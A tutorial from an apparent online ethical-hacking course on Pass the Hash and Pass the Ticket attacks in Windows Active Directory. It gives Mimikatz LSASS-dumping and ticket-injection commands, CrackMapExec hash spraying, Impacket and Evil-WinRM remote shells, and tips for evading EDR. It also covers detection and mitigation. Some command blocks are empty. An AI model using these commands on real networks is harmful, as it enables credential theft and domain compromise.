⚠️ Authorised Lab Use Only: Pass the Hash and Pass the Ticket techniques involve credential theft and lateral movement. Practice exclusively in your own isolated lab environment (Metasploitable, HackTheBox, TryHackMe) or with explicit written client authorisation during a sanctioned penetration test. Performing these attacks on networks you do not own is a criminal offence.
Pass the hash and pass the ticket 2026 are the two lateral movement techniques that turn a single compromised Windows workstation into full domain control. You do not crack passwords. You do not brute force anything. You take the authentication material the Windows operating system already stored in memory — NTLM hashes and Kerberos tickets — and you reuse them to authenticate as that user everywhere in the network. This is the moment where a real penetration test stops being theoretical and becomes a complete domain takeover, and today you are going to learn exactly how it works.
🎯 What You’ll Master in Day 26
Understand why NTLM hashes and Kerberos tickets can be reused without cracking
Extract NTLM hashes from LSASS memory using Mimikatz in a lab environment
Perform Pass the Hash with CrackMapExec and Impacket against Windows targets
Extract and inject Kerberos tickets for Pass the Ticket attacks
Understand detection methods and how defenders protect against these attacks
⏱️ 58 min read · 3 hands-on exercises
📊 Where are you with Active Directory attacks?
✅ This guide builds from conceptual foundations through hands-on techniques. If you completed Days 23–25, you have the AD context needed for everything here. If AD is new — start with the conceptual section before touching any tools.
📋 What You’ll Master in Day 26 — Pass the Hash & Pass the Ticket Tutorial
Pass the Hash Pass the Ticket — Why Windows Authentication Is the Vulnerability
To understand Pass the Hash, you need to understand how NTLM authentication works. When a Windows machine authenticates to a network resource using NTLM, it does not transmit the plaintext password. Instead, it transmits the NTLM hash of the password as the credential. The receiving server validates the hash — not the password. This design means the hash is functionally equivalent to the password for authentication purposes.
Windows stores NTLM hashes in memory inside the Local Security Authority Subsystem Service (LSASS) process. Any process running with SYSTEM privileges can access LSASS memory and extract those hashes. Once you have a hash, you can authenticate to any Windows service that uses NTLM authentication as that user — without ever knowing or cracking the plaintext password.
Pass the Ticket works on the same principle but for Kerberos authentication. When a user authenticates in an Active Directory environment, Windows stores their Kerberos tickets — Ticket Granting Tickets (TGTs) and service tickets — in memory. Extracting and injecting these tickets into a new session allows you to authenticate as that user to any Kerberos-protected service within the ticket’s validity window (typically 10 hours).
securityelites.com
PtH vs PtT — Attack Flow Comparison
PASS THE HASH (NTLM)
1. Compromise machine
2. Dump LSASS → get NTLM hash
3. Auth with hash (no crack needed)
4. Access SMB, WMI, WinRM Protocol: NTLM
PASS THE TICKET (KERBEROS)
1. Compromise machine
2. Dump Kerberos tickets from memory
3. Inject ticket into new session
4. Access AD services as victim user Protocol: Kerberos
📸 Pass the Hash vs Pass the Ticket — both techniques reuse authentication material from memory without cracking, targeting NTLM and Kerberos protocols respectively.
🧠 EXERCISE 1 — THINK LIKE A HACKER (10 MIN · NO TOOLS)
Why Resetting a Compromised User’s Password Does Not Stop Pass the Hash
⏱️ Time: 10 minutes · No tools required
Scenario: An incident response team detects that user “jsmith” has been
compromised. They immediately reset jsmith’s password. They believe the
threat is contained.
Think through these questions:
1. If the attacker already extracted jsmith’s NTLM hash from LSASS
before the password reset, can they still authenticate as jsmith?
Why or why not?
2. The attacker used jsmith’s access to compromise “administrator” on
a second machine and extracted that hash too. Does resetting jsmith’s
password help with the administrator account?
3. If the attacker has a valid Kerberos TGT for jsmith with 8 hours
remaining, and jsmith’s password is reset, can they still use that
ticket? (Hint: think about how ticket revocation works in Kerberos)
4. What should the incident response team do BEYOND just resetting
the password to actually contain a PtH/PtT compromise?
✅ What you just learned: Resetting a compromised password does NOT invalidate existing NTLM hashes already extracted — the hash changes, but the attacker has already moved. Kerberos TGTs remain valid until they expire (10 hours) unless the KRBTGT account key is rotated. A real containment response requires: isolating the compromised machines, rotating the KRBTGT key twice (which invalidates all existing tickets), and forcing password resets on ALL accounts that authenticated to compromised machines, not just the initially-breached account. This is why lateral movement makes incident response exponentially harder.
📸 Write your analysis and share in #day-26-pth on Discord.
Extracting NTLM Hashes From LSASS Memory With Mimikatz
Mimikatz is the tool that changed Active Directory security forever. Written by Benjamin Delpy, it demonstrated that Windows stores authentication credentials in memory in a recoverable form — a fact Microsoft was aware of but had not publicised. Today every penetration tester uses Mimikatz or its embedded versions (in Metasploit, CobaltStrike, and other frameworks) for credential extraction.
# Format: LM_hash:NT_hash — the NT hash is the one you use
# Alternative: dump only NT hashes
lsadump::sam
# Extract Kerberos tickets as well
sekurlsa::tickets /export
⚠️ AV and EDR Detection: Mimikatz is detected by virtually every antivirus and EDR solution by its binary signature. In real engagements, penetration testers use obfuscated versions, in-memory execution via Metasploit’s kiwi module, or tools like pypykatz (Python implementation) that are less detected. For lab practice, disable Windows Defender before running Mimikatz.
NTLM Hash Lateral Movement — CrackMapExec and Impacket in Practice
Once you have an NTLM hash, CrackMapExec is the fastest tool for determining which hosts in the network accept that hash for authentication. It sprays the hash across an entire subnet and reports which machines it can authenticate to — in seconds, across hundreds of hosts.
PASS THE HASH — CRACKMAPEXEC AND IMPACKET
# CrackMapExec — test hash against entire subnet via SMB
Kerberos Ticket Extraction — Stealing TGTs and Service Tickets
Kerberos tickets in memory represent active authenticated sessions. A TGT (Ticket Granting Ticket) allows you to request new service tickets for any service the user has access to — meaning a stolen TGT is effectively a full user session. Service tickets are more limited but allow access to a specific service without needing to contact the KDC again.
KERBEROS TICKET EXTRACTION WITH MIMIKATZ
# List all Kerberos tickets in current session
kerberos::list
# Export all tickets to .kirbi files in current directory
kerberos::list /export
[00000000] – 0x00000012 – aes256_hmac
Start/End/MaxRenew: [date range]
Server Name : krbtgt/CORP @ CORP.LOCAL
Client Name : jsmith @ CORP.LOCAL
Saved to file : 1-40e10000-jsmith@krbtgt~CORP-CORP.LOCAL.kirbi
# Alternative: use Rubeus (C# Kerberos toolkit) for stealthier extraction
Rubeus.exe dump /nowrap
# Export specific user’s tickets from another session
sekurlsa::tickets /export
Pass the Ticket Kerberos — Injecting Stolen Tickets for Service Access
With a .kirbi ticket file extracted, you can inject it into any session on any machine — even one that has never authenticated as that user. The target service will honour the ticket because it is cryptographically valid and was issued by the legitimate KDC. This technique is particularly powerful when the stolen ticket belongs to a highly privileged service account.
Step 1: Go to tryhackme.com and search for “Attacking Kerberos”
(free room — no subscription required)
Step 2: Read through Task 1-3 to understand the lab environment
(Windows Server with AD configured)
Step 3: Deploy the machine and connect via the TryHackMe VPN or
AttackBox
Step 4: Follow the Pass the Hash section using the pre-provided
NTLM hashes and CrackMapExec:
crackmapexec smb [target-ip] -u [user] -H [hash]
Step 5: Note which hosts return “(Pwn3d!)” — these accept the hash
Step 6: Open a shell on one of the vulnerable hosts using:
impacket-psexec [user]@[target] -hashes :[hash]
Step 7: From within the shell, run:
whoami
hostname
ipconfig
Step 8: Document: how many hosts accepted the same hash?
What does this tell you about password reuse in the environment?
✅ What you just learned: In real AD environments, local administrator passwords are often identical across all machines — a legacy of poor configuration management. When you find one machine’s administrator hash, CrackMapExec will frequently show you 5, 10, or 50 machines accepting the same credential. This is the “pass the hash spray” pattern that turns a single workstation compromise into full network access. The finding is so common it has a name: local administrator password reuse, and it is one of the most prevalent misconfigurations in enterprise Windows environments.
📸 Screenshot the CrackMapExec output showing Pwn3d! hosts and share in #day-26-pth on Discord.
How Defenders Detect PtH and PtT — And Why It Matters to You
As an ethical hacker, understanding detection is not just academic — it tells you how to write better findings in your reports, how to advise clients on remediation, and how to operate more stealthily during authorised engagements. Modern SOC teams actively hunt for PtH and PtT patterns.
Windows Event IDs to know: Event 4624 (successful logon) with Logon Type 3 and NTLM authentication package flags lateral movement. Event 4648 flags explicit credential use. Event 4688 with process name mimikatz.exe is an obvious alert. LSASS access by non-system processes triggers EDR products directly.
Mitigations clients should implement: Local Administrator Password Solution (LAPS) — Microsoft’s tool that sets unique, randomised local admin passwords on every machine, eliminating hash reuse attacks. Protected Users security group — places high-privilege accounts in a group that prevents NTLM authentication and Kerberos delegation. Credential Guard — Windows feature that stores credentials in a virtualisation-based isolated environment that Mimikatz cannot access.
⚡ EXERCISE 3 — KALI TERMINAL (30 MIN)
Perform Pass the Hash With Impacket Against Metasploitable/Windows Lab
⏱️ Time: 30 minutes · Kali Linux + Windows lab VM required (HackTheBox or TryHackMe acceptable)
PtH WITH IMPACKET — FULL WORKFLOW
# Step 1: Assume you have extracted this hash from a previous compromise:
✅ What you just learned: This is the hash spray cascade — one compromised machine yields hashes, each hash unlocks more machines, each new machine yields more hashes. This compounding lateral movement is why a single unpatched or misconfigured endpoint in an AD environment can lead to full domain compromise within hours. The impacket-secretsdump step is the key: it dumps the SAM database remotely, giving you all local account hashes on every machine you can authenticate to — feeding the next CrackMapExec sweep.
📸 Screenshot the shell prompt showing whoami output after successful PtH and share in #day-26-pth on Discord. Tag #lateralmovement2026
🧠 QUICK CHECK — Day 26
You extract an NTLM hash from a compromised workstation. The user’s account password is 32 characters long and would take millions of years to crack. What is the most efficient use of this hash?
📋 Commands Used Today — Day 26 Reference Card
privilege::debugMimikatz — enable SeDebugPrivilege to access LSASS memory
sekurlsa::logonpasswordsMimikatz — dump all logon credentials and NTLM hashes from LSASS
sekurlsa::tickets /exportMimikatz — export all Kerberos tickets to .kirbi files
kerberos::ptt [file.kirbi]Mimikatz — inject a stolen Kerberos ticket into current session
crackmapexec smb SUBNET -u USER -H HASHTest NTLM hash against all hosts in a subnet via SMB
impacket-psexec USER@IP -hashes :NTHASHOpen a SYSTEM shell on remote Windows host using NTLM hash
impacket-secretsdump USER@IP -hashes :NTHASHDump SAM database remotely — extracts all local account hashes
evil-winrm -i IP -u USER -H NTHASHWinRM shell via hash — useful when SMB is blocked
🏆 Mark Day 26 as Complete
You now understand the technique that turns single workstation access into full domain compromise. Pass the Hash and Pass the Ticket are in every professional penetration tester’s toolkit for exactly one reason: they work, consistently, in real enterprise environments.
❓ Frequently Asked Questions
What is the difference between Pass the Hash and Pass the Ticket?
Pass the Hash exploits NTLM authentication — you use a stolen NTLM hash to authenticate without cracking it. Pass the Ticket exploits Kerberos — you steal a Kerberos ticket from memory and inject it into a new session. PtH works against NTLM-protected services. PtT works against Kerberos-protected services, which is the default in Active Directory environments.
Do I need the plaintext password to perform Pass the Hash?
No — this is the core insight. Windows NTLM authentication uses the hash directly as the credential. The hash IS the password in NTLM’s model. You never need to crack it. This is why hash exposure is treated as a full credential compromise in AD environments.
Which tools perform Pass the Hash attacks?
The primary tools are: Mimikatz (hash extraction), CrackMapExec (mass PtH testing across subnets), Impacket suite (psexec, wmiexec, smbexec with -hashes flag), Evil-WinRM (WinRM shell with hash auth), and Metasploit’s psexec module. CrackMapExec is the most efficient for identifying which hosts accept a hash across an entire network.
How do defenders detect Pass the Hash attacks?
Security teams detect PtH via Windows Event ID 4624 with Logon Type 3 and NTLM authentication, combined with Event 4776. Abnormal lateral movement patterns trigger SIEM alerts. EDR solutions detect Mimikatz’s LSASS access directly. LAPS (Local Administrator Password Solution) eliminates hash reuse by assigning unique passwords to every machine.
What privileges are required to extract hashes with Mimikatz?
Mimikatz requires SYSTEM privileges or local Administrator rights with SeDebugPrivilege to access LSASS memory. You typically need to have compromised a local admin account first. This is why privilege escalation always precedes lateral movement in a real engagement.
What comes after Pass the Hash and Ticket in this course?
Day 27 covers BloodHound — the AD attack path visualisation tool that maps relationships between users, groups, and computers to automatically identify the shortest path to Domain Admin. After learning manual lateral movement today, BloodHound automates attack path discovery across complex environments.
BloodHound Tutorial 2026— Day 27 shows how to map all AD attack paths visually, using the lateral movement techniques from today as the edges in the BloodHound graph.
100-Day Ethical Hacking Course Hub— The complete course index covering every day from Linux basics through advanced AD attacks and red team operations.
Mimikatz GitHub Repository— The official Mimikatz source and documentation from Benjamin Delpy, covering all modules and their underlying Windows authentication exploitation techniques.
Hacking Articles — Pass the Hash Deep Dive— Comprehensive walkthrough of PtH variations including WMI, SMB, and RDP authentication bypass techniques with lab screenshots.
ME
Mr Elite
Owner, SecurityElites.com
On one of the most memorable engagements of my career, I compromised a single developer’s laptop through a phishing simulation. The machine had Credential Guard disabled — a policy gap. Mimikatz pulled three NTLM hashes. CrackMapExec swept the 192.168.1.0/24 subnet with each hash in under two minutes. Fourteen machines returned Pwn3d! — the IT helpdesk admin’s hash was the local administrator on every workstation in the office. From one developer laptop to full domain admin took 47 minutes. The client’s CISO was in the debrief room and genuinely went pale. That 47-minute number is in three separate board presentations that clients have sent me since. Lateral movement is not theoretical. It is Tuesday afternoon in most enterprise networks.
Leave a Reply